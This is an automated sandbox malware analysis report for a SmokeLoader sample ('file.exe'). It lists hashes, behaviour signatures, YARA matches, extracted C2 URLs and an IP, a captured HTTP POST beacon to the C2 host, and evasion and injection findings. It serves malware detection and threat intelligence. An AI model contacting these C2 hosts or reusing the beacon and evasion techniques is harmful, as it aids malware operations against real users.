Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:715074
MD5:e337a4d30d5b3cc3bcf3d3789dad3566
SHA1:739b485a3633b500c43320e98488538c0bda3106
SHA256:bddb07a1bc6effa8751ce6b40fc5e86f6c31f0b2403e696c99b522d89dd179dd
Tags:exeSmokeLoader
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged

Classification

  • System is w10x64
  • file.exe (PID: 5624 cmdline: C:\Users\user\Desktop\file.exe MD5: E337A4D30D5B3CC3BCF3D3789DAD3566)
    • explorer.exe (PID: 3320 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • vbfvrba (PID: 4616 cmdline: C:\Users\user\AppData\Roaming\vbfvrba MD5: E337A4D30D5B3CC3BCF3D3789DAD3566)
  • vbfvrba (PID: 3312 cmdline: C:\Users\user\AppData\Roaming\vbfvrba MD5: E337A4D30D5B3CC3BCF3D3789DAD3566)
  • cleanup
{"C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}
SourceRuleDescriptionAuthorStrings
0000000E.00000002.458450131.00000000005B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    0000000E.00000002.458450131.00000000005B0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x6f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    0000000E.00000003.446586296.00000000005B0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      0000000B.00000002.377030181.00000000021F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        0000000B.00000002.377030181.00000000021F0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
        • 0x6f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
        Click to see the 18 entries
        SourceRuleDescriptionAuthorStrings
        14.2.vbfvrba.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          14.3.vbfvrba.5b0000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            11.2.vbfvrba.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              0.2.file.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                14.2.vbfvrba.5a0e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  Click to see the 4 entries
                  No Sigma rule has matched
                  No Snort rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: file.exeVirustotal: Detection: 36%Perma Link
                  Source: http://host-host-file8.com/URL Reputation: Label: malware
                  Source: file.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaJoe Sandbox ML: detected
                  Source: 0000000E.00000002.458450131.00000000005B0000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}
                  Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: Binary string: C:\ruvodejet xufututowi.pdb source: file.exe, vbfvrba.1.dr
                  Source: Binary string: VC:\ruvodejet xufututowi.pdb source: file.exe, vbfvrba.1.dr

                  Networking

                  barindex
                  Source: C:\Windows\explorer.exeDomain query: host-host-file8.com
                  Source: Malware configuration extractorURLs: http://host-file-host6.com/
                  Source: Malware configuration extractorURLs: http://host-host-file8.com/
                  Source: Joe Sandbox ViewASN Name: GULFSTREAMUA GULFSTREAMUA
                  Source: Joe Sandbox ViewIP Address: 176.124.192.17 176.124.192.17
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ucdldn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: host-file-host6.com
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ucdldn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: host-file-host6.com
                  Source: unknownDNS traffic detected: queries for: host-file-host6.com

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: Yara matchFile source: 14.2.vbfvrba.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.3.vbfvrba.5b0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.vbfvrba.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.vbfvrba.5a0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.file.exe.6c0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.3.vbfvrba.21b0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.6b0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.vbfvrba.6e0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.458450131.00000000005B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000003.446586296.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.377030181.00000000021F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000003.364685451.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.243844808.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.327792065.0000000000860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.458781769.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.327822813.0000000000881000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.377400822.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.316092532.0000000002671000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: file.exe, 00000000.00000002.327865550.00000000008AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                  System Summary

                  barindex
                  Source: 0000000E.00000002.458450131.00000000005B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 0000000B.00000002.377030181.00000000021F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000000.00000002.327668635.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 0000000E.00000002.458435299.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 0000000B.00000002.376837614.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000002.327792065.0000000000860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 0000000E.00000002.458781769.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000000.00000002.327934318.00000000008BA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 0000000E.00000002.458600340.00000000005EE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000002.327822813.0000000000881000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 0000000B.00000002.377400822.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000001.00000000.316092532.0000000002671000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 0000000B.00000002.376742347.00000000005E9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 0000000E.00000002.458450131.00000000005B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 0000000B.00000002.377030181.00000000021F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000000.00000002.327668635.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 0000000E.00000002.458435299.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 0000000B.00000002.376837614.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000002.327792065.0000000000860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 0000000E.00000002.458781769.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000000.00000002.327934318.00000000008BA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 0000000E.00000002.458600340.00000000005EE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000002.327822813.0000000000881000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 0000000B.00000002.377400822.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000001.00000000.316092532.0000000002671000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 0000000B.00000002.376742347.00000000005E9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040180C Sleep,NtTerminateProcess,0_2_0040180C
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401818 Sleep,NtTerminateProcess,0_2_00401818
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401822 Sleep,NtTerminateProcess,0_2_00401822
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401826 Sleep,NtTerminateProcess,0_2_00401826
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401834 Sleep,NtTerminateProcess,0_2_00401834
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaCode function: 11_2_0040180C Sleep,NtTerminateProcess,11_2_0040180C
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaCode function: 11_2_00401818 Sleep,NtTerminateProcess,11_2_00401818
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaCode function: 11_2_00401822 Sleep,NtTerminateProcess,11_2_00401822
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaCode function: 11_2_00401826 Sleep,NtTerminateProcess,11_2_00401826
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaCode function: 11_2_00401834 Sleep,NtTerminateProcess,11_2_00401834
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaCode function: 14_2_0040180C Sleep,NtTerminateProcess,14_2_0040180C
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaCode function: 14_2_00401818 Sleep,NtTerminateProcess,14_2_00401818
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaCode function: 14_2_00401822 Sleep,NtTerminateProcess,14_2_00401822
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaCode function: 14_2_00401826 Sleep,NtTerminateProcess,14_2_00401826
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaCode function: 14_2_00401834 Sleep,NtTerminateProcess,14_2_00401834
                  Source: file.exeStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                  Source: vbfvrba.1.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                  Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: file.exeVirustotal: Detection: 36%
                  Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\vbfvrba C:\Users\user\AppData\Roaming\vbfvrba
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\vbfvrba C:\Users\user\AppData\Roaming\vbfvrba
                  Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vbfvrbaJump to behavior
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@3/2@4/1
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008BEF41 CreateToolhelp32Snapshot,Module32First,0_2_008BEF41
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\ruvodejet xufututowi.pdb source: file.exe, vbfvrba.1.dr
                  Source: Binary string: VC:\ruvodejet xufututowi.pdb source: file.exe, vbfvrba.1.dr

                  Data Obfuscation

                  barindex
                  Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaUnpacked PE file: 11.2.vbfvrba.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaUnpacked PE file: 14.2.vbfvrba.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004011D0 push ebx; iretd 0_2_00401217
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004011D7 push ebx; iretd 0_2_00401217
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004011EB push ebx; iretd 0_2_00401217
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B1252 push ebx; iretd 0_2_006B127E
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B123E push ebx; iretd 0_2_006B127E
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B1237 push ebx; iretd 0_2_006B127E
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008BFBB7 push ebx; iretd 0_2_008BFBF7
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008BFBCC push ebx; iretd 0_2_008BFBF7
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008CA9F2 push cs; iretd 0_2_008CAAE1
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C4A56 pushad ; iretd 0_2_008C4A5C
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaCode function: 11_2_004011D0 push ebx; iretd 11_2_00401217
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaCode function: 11_2_004011D7 push ebx; iretd 11_2_00401217
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaCode function: 11_2_004011EB push ebx; iretd 11_2_00401217
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaCode function: 11_2_006E1252 push ebx; iretd 11_2_006E127E
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaCode function: 11_2_006E123E push ebx; iretd 11_2_006E127E
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaCode function: 11_2_006E1237 push ebx; iretd 11_2_006E127E
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaCode function: 14_2_004011D0 push ebx; iretd 14_2_00401217
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaCode function: 14_2_004011D7 push ebx; iretd 14_2_00401217
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaCode function: 14_2_004011EB push ebx; iretd 14_2_00401217
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaCode function: 14_2_005A1252 push ebx; iretd 14_2_005A127E
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaCode function: 14_2_005A123E push ebx; iretd 14_2_005A127E
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaCode function: 14_2_005A1237 push ebx; iretd 14_2_005A127E
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vbfvrbaJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vbfvrbaJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
                  Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\vbfvrba:Zone.Identifier read attributes | deleteJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: file.exe, 00000000.00000002.327865550.00000000008AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Windows\explorer.exe TID: 5132Thread sleep count: 672 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 1932Thread sleep count: 412 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 1932Thread sleep time: -41200s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 5156Thread sleep count: 350 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 5156Thread sleep time: -35000s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 5892Thread sleep count: 576 > 30Jump to behavior
